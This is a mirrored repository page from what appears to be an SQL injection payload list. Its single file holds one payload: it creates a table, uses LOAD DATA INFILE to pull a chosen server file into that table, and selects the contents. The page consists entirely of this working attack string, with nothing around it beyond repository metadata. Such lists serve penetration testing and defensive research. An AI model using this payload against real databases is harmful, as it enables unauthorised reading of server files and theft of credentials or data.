mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-18 18:25:38 +00:00
2 lines
105 B
Plaintext
2 lines
105 B
Plaintext
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|